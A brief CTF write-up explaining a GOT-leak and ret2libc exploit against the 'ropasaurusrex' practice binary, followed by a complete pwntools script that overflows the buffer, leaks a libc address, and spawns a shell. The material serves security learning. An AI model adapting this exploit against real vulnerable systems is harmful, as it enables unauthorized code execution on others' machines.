
Leak using GOT exploit ..

OK this one was quite interesting exploit , it was too got exploit only but it's different & the exploit goes like this
1.) Oveflow until you reach eip
2.) Now use write function to leak the value @ got Table so that we can calculate system and '/bin/sh' address
3.) Now again trigger the vulnerable func again and then now use r2libc attack :)

I used this to solve rop3 in picoctf && ropasaurusrex

from pwn import * write_plt=0x0804830c vuln=0x08048426 write_got=0x08049614 system_offset=0x9e630 bin_offset=0x85e4b payload="A"*140+pack(write_plt)+pack(vuln)+pack(1)+pack(write_got)+pack(4) p=process("ropasaurusrex") p.sendline(payload) a=p.recv(4) a=u32(a) print "[+] Leaked Address" print hex(a) print "[+] Target address" system=a-system_offset print hex(system) binaddr=a+bin_offset payload="A"*140+pack(system)+pack(0xdeadbeef)+pack(binaddr) p.sendline(payload) p.interactive()